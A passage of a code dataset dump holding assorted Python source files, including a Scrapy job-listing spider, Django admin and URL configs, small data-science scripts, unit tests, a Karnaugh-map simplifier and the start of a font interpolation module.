mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://it.careo.jp/list.php\"\n\nSample URL:\n http://it.careo.jp/list.php\n http://office.careo.jp/list.php\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import HtmlFormatter, Prefix\n\npattern = {\n 'ref_id': compile(r'no=(\\d+)'),\n}\n\n\nclass Careo(ATSSpider):\n\n name = 'careo'\n logo_url = ''\n\n def parse(self, response):\n sel = Selector(response)\n # set expected job count\n if not self.expected_job_count_set:\n expected_count = sel.xpath(\n '//div/div[@id=\"count\"]/text()'\n ).extract()\n if expected_count:\n self.expected_job_count = expected_count\n\n if not self.logo_url:\n logo_url = sel.xpath(\n '//div[@class=\"logo\"]/a/img/@src'\n ).extract()\n if logo_url:\n self.logo_url = urljoin(response.url, logo_url[0])\n\n for href in sel.xpath(\n '//div[@class=\"result\"]/div[@class=\"item\"]//div[@class=\"go_detail\"]/a/@href'\n ).extract():\n yield Request(\n callback=self.parse_job_callback(),\n url=urljoin(response.url, href)\n )\n\n # pagination\n next_page = sel.xpath(\n '//ul[contains(@class, \"nombre\")]/li/a[@class=\"active\"]/../following-sibling::li[1]/a/@href'\n ).extract()\n if next_page:\n yield Request(\n callback=self.parse,\n url=urljoin(response.url, next_page[0])\n )\n\n def parse_job(self, response):\n \"\"\"\n Extract all required information.\n \"\"\"\n sel = Selector(response)\n\n loader = BrightcorpItemLoader(selector=sel)\n\n loader.add_xpath(\n 'title',\n '//div[@id=\"detail\"]/div[@id=\"catchArea\"]/p[@class=\"catch\"]/text()'\n )\n loader.add_xpath(\n 'location',\n '//tr/th[contains(text(), \"%s\")]/following-sibling::td[1]/text()' % unicode('勤務地', 'utf-8')\n )\n if not loader.get_output_value('location'):\n loader.add_xpath(\n 'location',\n '//tr/th[contains(text(), \"%s\")]/following-sibling::td[1]//text()' % unicode('最寄駅', 'utf-8')\n )\n loader.add_value(\n 'referencenumber',\n response.url,\n Prefix('%s-' % self.name),\n re=pattern['ref_id']\n )\n loader.add_value('url', response.url)\n loader.add_xpath(\n 'description',\n '//div[@class=\"box\"]/div[@id=\"descript\"]'\n )\n loader.add_xpath(\n 'jobtype',\n '//div[contains(@class, \"jobdetail\")]/div[@class=\"kontakt\"]/div/strong[contains(text(), \"Art:\")]/following-sibling::text()[1]'\n )\n loader.add_xpath(\n 'jobcategory',\n '//div[@class=\"box\"]/div[@class=\"box\"]/p/text()'\n )\n loader.add_xpath(\n 'workhours',\n '//tr/th[contains(text(), \"%s\")]/following-sibling::td[1]//text()' % unicode('勤務時間', 'utf-8')\n )\n loader.add_xpath(\n 'baseSalary',\n '//tr/th[contains(text(), \"%s\")]/following-sibling::td[1]//text()' % unicode('給与', 'utf-8')\n )\n loader.add_xpath(\n 'requirements',\n '//tr[th[contains(text(), \"%s\")]]' % unicode('求める人材・スキル要件', 'utf-8'),\n HtmlFormatter()\n )\n loader.add_value('logo_url', self.logo_url)\n loader.add_value('apply_url', response.url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/careo.py","file_name":"careo.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"161198986","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\minixsv\\__init__.py\n# Compiled at: 2008-08-08 10:44:32\nXMLIF_MINIDOM = 'XMLIF_MINIDOM'\nXMLIF_4DOM = 'XMLIF_4DOM'\nXMLIF_ELEMENTTREE = 'XMLIF_ELEMENTTREE'\nEMPTY_PREFIX = None\nEMPTY_NAMESPACE = None\nXML_NAMESPACE = 'http://www.w3.org/XML/1998/namespace'\nXMLNS_NAMESPACE = 'http://www.w3.org/2000/xmlns/'\nXSD_NAMESPACE = 'http://www.w3.org/2001/XMLSchema'\nXSI_NAMESPACE = 'http://www.w3.org/2001/XMLSchema-instance'\nimport os\nMINIXSV_DIR = os.path.dirname(__file__)\nfrom xsvalErrorHandler import IGNORE_WARNINGS, PRINT_WARNINGS, STOP_ON_WARNINGS\nfrom xsvalErrorHandler import XsvalError","sub_path":"pycfiles/minixsv-0.9.0-py2.4/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"41286107","text":"import numpy as np\n\nclass CURVE():\n def __init__(self, n_examples=20, noise=0, is_train=True):\n super(CURVE, self).__init__()\n self.n_examples = n_examples\n if is_train:\n self.X = np.random.uniform(-1, 1, [self.n_examples])\n else:\n self.X = np.linspace(-1, 1, self.n_examples, dtype=np.float32)\n self.Y = self._polynomial_with_noise(self.X, noise, is_train)\n self.X = self.X.reshape([-1,1])\n self.Y = self.Y.reshape([-1,1])\n\n def _polynomial_with_noise(self, X, noise, is_train):\n Y = (X+0.5)*X*(X-0.5)\n if is_train and noise > 0:\n Y += np.random.normal(loc=0, scale=noise, size=len(X))\n return Y\n\n def showCurve(self):\n import matplotlib.pyplot as plt\n plt.plot(self.X, self.Y, 'r--')\n plt.show()\n return True\n\nif __name__ == '__main__':\n curve = CURVE(is_train=True)\n","sub_path":"CURVE_FIT/datasets/toydata.py","file_name":"toydata.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"560802138","text":"import os\nimport pandas\nfrom sklearn import linear_model\nfrom sklearn.preprocessing import StandardScaler\n\n\nscale = StandardScaler()\ndf = pandas.read_csv(os.path.dirname(os.path.abspath(__file__)) + \"/cars2.csv\")\nX = df[[\"Weight\", \"Volume\"]]\ny = df[\"CO2\"]\nscaledX = scale.fit_transform(X)\nregression = linear_model.LinearRegression()\nregression.fit(scaledX, y)\nscaled = scale.transform([[2300, 1.3]])\npredictedCO2 = regression.predict([scaled[0]])\nprint(predictedCO2)\n","sub_path":"scale/predict_co2_values.py","file_name":"predict_co2_values.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"347748614","text":"from django.contrib import admin\nfrom .models import *\n\n\n@admin.register(CaptchaBasic)\nclass CaptchaBasicAdmin(admin.ModelAdmin):\n list_display = ['token', 'code', 'authenticate', 'available',\n 'createTime', 'updateTime', 'ipAddr', 'requestSourse']\n list_filter = ['available']\n search_fields = ['token', 'ipAddr', 'requestSourse']\n ordering = ['-updateTime']\n list_per_page = 100\n\n def get_readonly_fields(self, request, obj=None):\n arr = [f.name for f in self.model._meta.fields]\n arr.remove('available')\n return arr\n","sub_path":"projects/Beiyang1895BEVersion1/apps/captcha/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"548950814","text":"import sys, re, string, pickle\nfrom itertools import *\n\ndef main():\n\tinCsv1 = open(sys.argv[1], 'r')\n\tinCsv2 = open(sys.argv[2], 'r')\n\toutCsv = open(sys.argv[3], 'w')\n\ts1, s2 = set(), set()\n\tfor l in inCsv1:\n\t\ts1.add(l.strip())\n\tfor l in inCsv2:\n\t\ts2.add(l.strip())\n\ts1 &=s2\n\tprint >> outCsv, \"\\n\".join([i for i in s1])\n\tinCsv1.close()\n\tinCsv2.close()\n\toutCsv.close()\n\n\t\t\nif __name__ == \"__main__\": main()\n","sub_path":"python/intersect.py","file_name":"intersect.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"414731282","text":"from sellmo import modules\nfrom sellmo.api.decorators import link\n\n\n@link(namespace=modules.product.namespace, capture=True)\ndef list(index=None, qty=None, **kwargs):\n if index is None:\n index = 'product_price'\n if qty is None:\n qty = 9999999\n return {\n 'index': index,\n 'qty': qty,\n }\n\n\n@link(namespace=modules.product.namespace)\ndef list(products, query=None, **kwargs):\n if query:\n if ('sort', 'name') in query:\n products = products.order_by('name')\n elif ('sort', '-name') in query:\n products = products.order_by('-name')\n return {\n 'products': products\n }","sub_path":"example/product/links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"39586868","text":"from django.conf.urls.defaults import *\nfrom django.conf import settings\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom core import views\n\nurlpatterns = patterns(\n '',\n # blog\n url(r'^$', views.BlogView.as_view(), {}, name='hello-world'),\n url(r'^blog/delete/(?P<id>[0-9]+)$', csrf_exempt(views.BlogView.as_view()), {}, name='delete-blog'),\n url(r'^blog$', csrf_exempt(views.BlogView.as_view()), {}, name='create-blog'),\n \n # post\n url(r'^post/(?P<id>[-_a-zA-Z0-9]+)$', csrf_exempt(views.PostView.as_view()), {}, name='create-post'),\n url(r'^post/edit/(?P<id>[-_a-zA-Z0-9]+)$', csrf_exempt(views.PostView.as_view()), {}, name='edit-post'),\n url(r'^post/delete/(?P<id>[-_a-zA-Z0-9]+)$', csrf_exempt(views.PostView.as_view()), {}, name='delete-post'),\n\n # commenting\n url(r'^post/(?P<id>[-_a-zA-Z0-9]+)/comment$', csrf_exempt(views.CommentView.as_view()), {}, name='post-comment'),\n url(r'^comment/edit/(?P<id>[-_a-zA-Z0-9]+)$', csrf_exempt(views.CommentView.as_view()), {}, name='edit-comment'),\n url(r'^comment/delete/(?P<id>[-_a-zA-Z0-9]+)$', csrf_exempt(views.CommentView.as_view()), {}, name='delete-comment'),\n\n\n url(r'^__exception_test__/$', views.exception_test, {}),\n)\n\nif settings.DEBUG:\n urlpatterns += patterns(\n '',\n url(r'^500/$', 'django.views.generic.simple.direct_to_template', {'template': '500.html'}),\n url(r'^404/$', 'django.views.generic.simple.direct_to_template', {'template': '404.html'}),\n )\n","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"10336132","text":"\n\ndef get_value_from_data(obj, path=None, transform=None):\n \"\"\"\n Search obj from inner format by path.\n :param obj: searching object\n :param path: list of obj - one of str or int\n :param transform: callable function\n :return:\n \"\"\"\n if not path:\n if transform is None:\n return obj\n return transform(obj)\n root_path = path[0]\n if isinstance(obj, list):\n if isinstance(root_path, int):\n if len(obj) >= root_path:\n return get_value_from_data(obj[root_path], path[1:], transform)\n raise MapperPathError(\n obj, root_path, 'root_path index must be less then object size'\n )\n elif isinstance(obj, dict):\n if root_path in obj:\n return get_value_from_data(obj.get(root_path), path[1:], transform)\n raise MapperPathError(\n obj, root_path, 'obj must contains root_path'\n )\n else:\n raise MapperPathError(\n obj, path, 'unknown type of obj'\n )\n\n\nclass MapperPathError(ValueError):\n\n def __init__(self, obj, path, message):\n err = 'Cant\\'t find path %s from obj %s: %s' % (path, obj, message)\n super(MapperPathError, self).__init__(err)\n","sub_path":"data_mappers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"3754848","text":"from orz.ast import NodeListField\nfrom orz.visit import Environment as BaseEnvironment, Visitor\n\nfrom . import ast\nfrom .asm import Label\n\n\nclass LabelTable(object):\n\n\n def __init__(self):\n self.labels = {}\n self.gotos = {} # pending goto\n self.locals = []\n\n\n def close(self, is_last=False):\n remain = self.gotos.keys()\n if not is_last:\n return remain\n\n # TODO: sort by lexpos\n if remain:\n raise SyntaxError(\"no visible label '{}' for <goto> at line {:d}\")\n\n\n def declare_locals(self, locals):\n self.locals.extend(locals)\n\n\n def got_label(self, label):\n label.label = Label()\n name = label.name\n\n other = self.labels.get(name, None)\n\n if other is not None:\n # TODO: ,(filename, lineno, offset, text)\n raise SyntaxError(\n \"label '{}' already defined on line {:d}\".format(\n name, other.lineno))\n\n self.labels[name] = label\n\n resolved = [ goto for goto in self.gotos if goto.target == name ]\n\n for goto in resolved:\n goto.label = label.label\n nlocals = self.gotos.pop(goto)\n\n if nlocals < len(self.locals): # XXX\n raise SyntaxError(\n \"<goto {}> at line {:d} jumps into the scope of local '{}'\".format(\n name, goto.lineno, self.locals[nlocals]))\n\n\n def got_goto(self, goto):\n label = self.labels.get(goto.target, None)\n if label is None:\n self.gotos[goto] = len(self.locals)\n else:\n goto.label = label.label\n\n\n\nclass Environment(BaseEnvironment):\n FIELDS = ('filename', 'label_table')\n\n\n\nvisit = Visitor()\n\n\n\ndef nop(env, node):\n pass\n\n\ndef visit_topblock(env, node):\n label_table = LabelTable()\n\n for subnode in node.body:\n visit(env(label_table=label_table), subnode)\n\n label_table.close(True)\n return node\n\n\ndef visit_subblock(env, nodes):\n block_table = LabelTable()\n\n for node in nodes:\n visit(env(label_table=block_table), node)\n\n for goto in block_table.close():\n env.label_table.got_goto(goto)\n\n\ndef visit_body(env, node):\n visit_subblock(env, node.body)\n\n\n@visit.match(ast.Label)\ndef visit_Label(env, node):\n env.label_table.got_label(node)\n\n\n@visit.match(ast.Goto)\ndef visit_Goto(env, node):\n env.label_table.got_goto(node)\n\n\nvisit.match(ast.Block)(visit_body)\nvisit.match(ast.While)(visit_body)\nvisit.match(ast.Repeat)(visit_body)\nvisit.match(ast.For)(visit_body)\nvisit.match(ast.ForEach)(visit_body)\n\n\n@visit.match(ast.If)\ndef visit_If(env, node):\n visit_subblock(env, node.body)\n visit_subblock(env, node.orelse)\n\n\nvisit.match(ast.File)(visit_topblock)\nvisit.match(ast.Function)(visit_topblock)\n\n\n@visit.match(ast.FunctionLocal)\ndef visit_FunctionLocal(env, node):\n visit_topblock(env, node)\n env.label_table.declare_locals([node.name.id])\n\n\n@visit.match(ast.AssignLocal)\ndef visit_AssignLocal(env, node):\n env.label_table.declare_locals([t.id for t in node.target])\n\n\nvisit.match(ast.Assign)(nop)\nvisit.match(ast.CallStatement)(nop)\nvisit.match(ast.Return)(nop)\nvisit.match(ast.Break)(nop)\n","sub_path":"orz/lua/label.py","file_name":"label.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"321861562","text":"from unittest import TestCase\nfrom unittest.mock import Mock, MagicMock, patch\nfrom atomium.converters.strings import string2lines, string_from_file, string_to_file\n\nclass String2LinesTests(TestCase):\n\n def test_line_becomes_line(self):\n self.assertEqual(string2lines(\"A line.\"), [\"A line.\"])\n\n\n def test_can_break_string_on_newline(self):\n self.assertEqual(string2lines(\"A line.\\nB line.\"), [\"A line.\", \"B line.\"])\n\n\n def test_can_handle_windows_linebreaks(self):\n self.assertEqual(string2lines(\"A line.\\r\\nB line.\"), [\"A line.\", \"B line.\"])\n\n\n\nclass StringFromFileTests(TestCase):\n\n @patch(\"builtins.open\")\n def test_gets_string_from_file(self, mock_open):\n open_return = MagicMock()\n mock_file = Mock()\n open_return.__enter__.return_value = mock_file\n mock_file.read.return_value = \"returnstring\"\n mock_open.return_value = open_return\n string = string_from_file(\"path/to/file\")\n mock_open.assert_called_with(\"path/to/file\")\n self.assertEqual(string, \"returnstring\")\n\n\n\nclass StringToFileTests(TestCase):\n\n @patch(\"builtins.open\")\n def test_saves_string_to_file(self, mock_open):\n open_return = MagicMock()\n mock_file = Mock()\n mock_write = MagicMock()\n mock_file.write = mock_write\n open_return.__enter__.return_value = mock_file\n mock_open.return_value = open_return\n string_to_file(\"filestring\", \"filename\")\n mock_open.assert_called_once_with(\"filename\", \"w\")\n mock_write.assert_called_once_with(\"filestring\")\n","sub_path":"tests/unit/converter_tests/test_string_processing.py","file_name":"test_string_processing.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"410762347","text":"import sys\nimport pprint\n\n# oi times <list of values> antistoixoun stis theseis tou pinaka alla se arithmous grey,\n# diladi to 8(1000) einai to 12(0011) se grey arithmo kai ara dixnei sth sydetagmenh:\n# 00: grammi(CD) 0 kai 11: stili(AB) 2 k.o.k.\n\nlist_of_values=[]\nif len(sys.argv) > 1:\n for i in range(len(sys.argv)):\n if i > 0:\n n = int(sys.argv[i])\n list_of_values.append(n)\n\nif len(sys.argv) == 17 :\n print('F = 1')\n\nlist_of_gray=[]\nfor i in list_of_values:\n #len = bit_len(i)\n #print(len)\n ab = bin(i >> 2)\n cd = bin(i & 0b0011)\n a = bin((i>>2)>>1)\n b = bin((i>>2) & 0b01)\n c = bin((i & 0b0011)>>1)\n d = bin((i & 0b0011) & 0b01)\n list_of_gray.append([a,b,c,d,i])\n\nteams=[0,0,0,0]\nteam_row = [] # oles oi grammes me 1\nteam_col = [] # oles oi stiles me 1\nsolo_ones = []\nteam_r = {}\nteam_c = {}\nvisited=[]\nfor b1 in list_of_gray:\n for b2 in list_of_gray:\n if b1[3] == b2[2] and b2 not in team_col and b1 != b2: # gia na einai to y epomeno tou x: b1[D] == b2[C]\n if (b1[0],b1[1]) == (b2[0],b2[1]): # vriskontai sthn idia stili (b1[A],b1[B])==(b2[A],b2[B])\n if (b1[0],b1[1]) not in team_c.keys():\n team_c[(b1[0],b1[1])] = [b1,b2]\n team_col.append(b1)\n team_col.append(b2)\n else:\n team_c[(b1[0],b1[1])].append(b2)\n team_col.append(b2)\n\n if b1[1] == b2[0] and b2 not in team_row and b1 != b2: # gia na einai to y epomeno tou x: b1[B] == b2[B]\n if (b1[2],b1[3]) == (b2[2],b2[3]): # vriskontai sthn idia seira\n if (b1[2],b1[3]) not in team_r.keys():\n team_r[(b1[2],b1[3])] = [b1,b2]\n team_row.append(b1)\n team_row.append(b2)\n else:\n team_r[(b1[2],b1[3])].append(b2)\n team_row.append(b2)\nfor b in list_of_gray:\n if b not in team_col and b not in team_row:\n solo_ones.append(b)\n\ngrammes = list(team_r.keys())\nstiles = list(team_c.keys())\nvisited=[[],[]]\nomades = [] # omades grammwn omadopoihmenes ana plithos stoixeiwn\ngroup = []\nmikos = 4\nplithos = 0\nwhile plithos <= len(grammes)+len(stiles):\n plithos +=1\n list_grammwn = []\n list_stilwn = []\n for x in grammes:\n for y in grammes:\n if x[1] == y[0]: # vriskontai sthn amesws epomenh grammi\n if len(team_r[x]) == len(team_r[y]) == mikos:\n if all(i[0]==j[0] and i[1]==j[1] for i,j in zip(team_r[x], team_r[y])): # tha preprei n vriskontai sthn idia stili A kai B\n if y not in list_grammwn:\n list_grammwn.append(y)\n visited[0].append(y)\n\n if len(list_grammwn) != 0:\n if len(list_grammwn)!=3:\n if list_grammwn not in omades:\n omades.append(list_grammwn)\n else:\n if (i[2] != j[2] and i[3] != j[3] for x in list_grammwn for y in list_grammwn for x in team_r[i] for y in team_r[j]):\n list_grammwn.remove(y)\n omades.append(list_grammwn)\n\n for x in stiles:\n for y in stiles:\n if x[1] == y[0]:\n if len(team_c[x]) == len(team_c[y]) == mikos:\n if all(i[2]==j[2] and i[3]==j[3] for i,j in zip(team_c[x], team_c[y])):\n if y not in list_stilwn:\n list_stilwn.append(y)\n visited[1].append(y)\n if len(list_stilwn) != 0:\n if list_stilwn not in group:\n group.append(list_stilwn)\n mikos = int(mikos/2)\n\nsolo_row=[]\nsolo_col=[]\nm = 4\nwhile m <=1:\n for x in grammes:\n if x not in visited[0] and len(team_r(x))==m:\n solo_row.append(team_r[x])\n for y in stiles:\n if y not in visited[1] and len(team_c(y))==m:\n solo_col.append(team_c[y])\n m = int(m/2)\n\ndef find_numbers(team):\n numbers=[]\n for number in team: # arxika pernw ta noumera tou kathe gray aritmou ths stilis\n numbers.append(number[4])\n return numbers\n\ndef bitwise_and(k,n):\n return(k&n)\n\ndef bitwise_or(k,n):\n return(k|n)\n\ndef find_what_letter_has_1_or_0_(i):\n letters_with_1=[]\n letters_with_0_or_1=[0,0,0,0]\n a = bin((i>>2)>>1)\n b = bin((i>>2) & 0b01)\n c = bin((i & 0b0011)>>1)\n d = bin((i & 0b0011) & 0b01)\n if a == '0b1': # A\n letters_with_0_or_1[0] = (1)\n\n if b == '0b1': # B\n letters_with_0_or_1[1] = (1)\n\n if c == '0b1': # C\n letters_with_0_or_1[2] = (1)\n\n if d == '0b1': # D\n letters_with_0_or_1[3] = (1)\n\n return (letters_with_0_or_1)\n\ndef answerPerGroup(results):\n AnswerPerGroup=''\n for i in results:\n if i[0][0] == 1:\n AnswerPerGroup += 'A'\n if i[0][1] == 1:\n AnswerPerGroup += 'B'\n if i[0][2] == 1:\n AnswerPerGroup += 'C'\n if i[0][3] == 1:\n AnswerPerGroup += 'D'\n if i[1][0] == 0:\n AnswerPerGroup += '~A'\n if i[1][1] == 0:\n AnswerPerGroup += '~B'\n if i[1][2] == 0:\n AnswerPerGroup += '~C'\n if i[1][3] == 0:\n AnswerPerGroup += '~D'\n return(AnswerPerGroup)\n\nresults=[]\nnumbers_of_each_col=[]\nfor i in group: # gia kathe omada stis omades stilwn\n aces = 15\n zeros = 0\n for j in i: # kathe stili sthn omada\n numbers_of_each_col += find_numbers(team_c[j]) # arxika pernw ta noumera tou kathe gray aritmou ths stilis\n for i in numbers_of_each_col:\n # arxika that ta kanw logiko and & gia na mou emfanistoun ta koina 1\n # kai logiko or | gia na vrw ta koina 0 se afth tnn omada\n aces = bitwise_and(aces,i)\n zeros = bitwise_or(zeros,i)\n # spaw ta apo telesmata zeros, aces se A,B,C,D\n results.append([find_what_letter_has_1_or_0_(aces),find_what_letter_has_1_or_0_(zeros)])\n\nresult=[]\nnumbers_of_each_row = []\nfor i in omades: # gia kathe omada stis omades grammwn\n aces = 15\n zeros = 0\n for j in i: # kathe stili sthn omada\n numbers_of_each_row += find_numbers(team_r[j]) # arxika pernw ta noumera tou kathe gray aritmou ths stilis\n for i in numbers_of_each_row:\n # arxika that ta kanw logiko and & gia na mou emfanistoun ta koina 1\n # kai logiko or | gia na vrw ta koina 0 se afth tnn omada\n aces = bitwise_and(aces,i)\n zeros = bitwise_or(zeros,i)\n # spaw ta apo telesmata zeros, aces se A,B,C,D\n result.append([find_what_letter_has_1_or_0_(aces),find_what_letter_has_1_or_0_(zeros)])\n\nres=[]\nif len(solo_row) != 0 :\n res=[] # gia monaxikes grammes\n numbers=[s]\n aces = 15\n zeros = 0\n for i in solo_row: # kathe stili sthn omada\n numbers += find_numbers(solo_row[j]) # arxika pernw ta noumera tou kathe gray aritmou ths stilis\n for i in numbers:\n # arxika that ta kanw logiko and & gia na mou emfanistoun ta koina 1\n # kai logiko or | gia na vrw ta koina 0 se afth tnn omada\n aces = bitwise_and(aces,i)\n zeros = bitwise_or(zeros,i)\n # spaw ta apo telesmata zeros, aces se A,B,C,D\n res.append([find_what_letter_has_1_or_0_(aces),find_what_letter_has_1_or_0_(zeros)])\n\nr=[]\nif len(solo_col) != 0 :\n numbers =[]\n r=[] # gia monaxikes stiles\n aces = 15\n zeros = 0\n for i in solo_col: # kathe stili sthn omada\n print(i)\n print(solo_col[i])\n numbers += find_numbers(solo_col[j]) # arxika pernw ta noumera tou kathe gray aritmou ths stilis\n for i in numbers:\n # arxika that ta kanw logiko and & gia na mou emfanistoun ta koina 1\n # kai logiko or | gia na vrw ta koina 0 se afth tnn omada\n aces = bitwise_and(aces,i)\n zeros = bitwise_or(zeros,i)\n print(bin(aces),bin(zeros))\n # spaw ta apo telesmata zeros, aces se A,B,C,D\n r.append([find_what_letter_has_1_or_0_(aces),find_what_letter_has_1_or_0_(zeros)])\n \nk=0\nF=''\nif answerPerGroup(results) not in F:\n k += 1\n F = F + answerPerGroup(results)\nif answerPerGroup(result) not in F:\n k += 1\n F = F + \" V \" + answerPerGroup(result)\nif answerPerGroup(res) not in F:\n k += 1\n F = F + \" V \" + answerPerGroup(res)\nif answerPerGroup(r) not in F:\n k += 1\n F = F + \" V \" + answerPerGroup(r)\nprint('F =',F,k)\n","sub_path":"assignment-2018-3/boolean_complexity.py","file_name":"boolean_complexity.py","file_ext":"py","file_size_in_byte":8326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"508126723","text":"#Find the sum of the odd numbers within an array, after cubing the initial integers. \n#The function should return undefined/None/nil/NULL if any of the values aren't numbers.\n\n#Note: Booleans should not be considered as numbers.\n\n\ndef cube_odd(arr):\n a=[]\n b=[]\n for i in arr:\n if str(i).isalpha() == True:\n return None\n for i in arr:\n a.append(i**3)\n for i in a:\n if (i % 2) == 1:\n b.append(i)\n return sum(b)\n","sub_path":"odd_cube_sum.py","file_name":"odd_cube_sum.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"349569572","text":"#! python3\n\nimport math\n\ndef tempConversion(tem,by=\"C\"):\n if by == \"C\":\n answer = (tem * 9/5) + 32\n if by == \"F\":\n answer = 5 * (tem - 32) / 9\n answer = round(answer,1)\n return answer\n\ndef factorPair(a, b):\n numlist = []\n numlist.append(b)\n numlist.append(a / b)\n numlist.sort()\n return numlist\n\ndef toRadians(degree):\n resultt = math.pi / 180 * degree\n return resultt\n\n\ndef solution(n):\n n.sort()\n result = n[1]\n return result\n \n\ndef quadratic(d,f,g):\n i = (-f + math.sqrt(f ** 2 - 4 * d * g)) / (2 * d)\n n = (-f - math.sqrt(f ** 2 - 4 * d * g)) / (2 * d)\n result1 = [i,n]\n result1.sort()\n return result1\n\n\ndef cosineLaw(q,w,e,oppositeSide=True):\n if oppositeSide == True:\n result = math.sqrt(q ** 2 + w ** 2 - 2 * q * w * math.cos(toRadians(e)))\n return result\n if oppositeSide == False:\n a1 = 1\n b1 = -2 * q * math.cos(toRadians(e))\n c1 = q ** 2 - w ** 2 \n if b1 ** 2 - 4 * a1 * c1 >= 0:\n Y=quadratic(a1,b1,c1)\n x = solution(Y)\n return x\n else:\n a1 = 1\n b1 = -2 * w * math.cos(toRadians(e))\n c1 = w ** 2 - q ** 2\n Y=quadratic(a1,b1,c1)\n x = solution(Y)\n return x\n\n","sub_path":"assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"346346521","text":"import unittest\nfrom bodydouble.body_double import BodyDouble\n\n\nclass TestSetsAttributes(unittest.TestCase):\n def test_sets_attribute_in_init(self):\n body_double = BodyDouble('foo', foo='bar', return_value='boo')\n\n assert body_double.foo == 'bar'\n assert body_double.return_value == 'boo'\n\n def test_should_get_and_set_arbitrary_attributes(self):\n body_double = BodyDouble()\n\n foo = body_double.foo\n \n assert isinstance(foo, BodyDouble)\n assert body_double.foo == foo","sub_path":"tests/test_attributes.py","file_name":"test_attributes.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"483081277","text":"# coding: utf-8\n\n\nfrom __future__ import print_function, division, absolute_import\n\nimport plistlib\nimport os\nimport logging, traceback\nimport collections\nfrom pprint import pprint\n\nfrom fontTools.designspaceLib import DesignSpaceDocument, SourceDescriptor, InstanceDescriptor, AxisDescriptor, RuleDescriptor, processRules\nfrom fontTools.varLib.models import VariationModel, normalizeLocation\n\nfrom ufoLib import fontInfoAttributesVersion1, fontInfoAttributesVersion2, fontInfoAttributesVersion3\n\nimport defcon\nfrom defcon.objects.font import Font\nfrom defcon.pens.transformPointPen import TransformPointPen\nfrom defcon.objects.component import _defaultTransformation\nfrom fontMath.mathGlyph import MathGlyph\nfrom fontMath.mathInfo import MathInfo\nfrom fontMath.mathKerning import MathKerning\n\n# if you only intend to use varLib.model then importing mutatorMath is not necessary.\nfrom mutatorMath.objects.mutator import buildMutator\nfrom ufoProcessor.varModels import VariationModelMutator\n\n\nclass UFOProcessorError(Exception):\n def __init__(self, msg, obj=None):\n self.msg = msg\n self.obj = obj\n\n def __str__(self):\n return repr(self.msg) + repr(self.obj)\n\n\n\"\"\"\n Processing of rules when generating UFOs.\n Swap the contents of two glyphs.\n - contours\n - components\n - width\n - group membership\n - kerning\n\n + Remap components so that glyphs that reference either of the swapped glyphs maintain appearance\n + Keep the unicode value of the original glyph.\n \n Notes\n Parking the glyphs under a swapname is a bit lazy, but at least it guarantees the glyphs have the right parent.\n\n\"\"\"\n\n\n\"\"\" \n build() is a convenience function for reading and executing a designspace file.\n documentPath: path to the designspace file.\n outputUFOFormatVersion: integer, 2, 3. Format for generated UFOs. Note: can be different from source UFO format.\n useVarlib: True if you want the geometry to be generated with varLib.model instead of mutatorMath.\n\"\"\"\n\ndef build(\n documentPath,\n outputUFOFormatVersion=3,\n roundGeometry=True,\n verbose=True, # not supported\n logPath=None, # not supported\n progressFunc=None, # not supported\n processRules=True,\n logger=None,\n useVarlib=False,\n ):\n \"\"\"\n Simple builder for UFO designspaces.\n \"\"\"\n import os, glob\n if os.path.isdir(documentPath):\n # process all *.designspace documents in this folder\n todo = glob.glob(os.path.join(documentPath, \"*.designspace\"))\n else:\n # process the \n todo = [documentPath]\n results = []\n for path in todo:\n document = DesignSpaceProcessor(ufoVersion=outputUFOFormatVersion)\n document.useVarlib = useVarlib\n document.roundGeometry = roundGeometry\n document.read(path)\n try:\n r = document.generateUFO(processRules=processRules)\n results.append(r)\n except:\n if logger:\n logger.exception(\"ufoProcessor error\")\n #results += document.generateUFO(processRules=processRules)\n reader = None\n return results\n\n\ndef 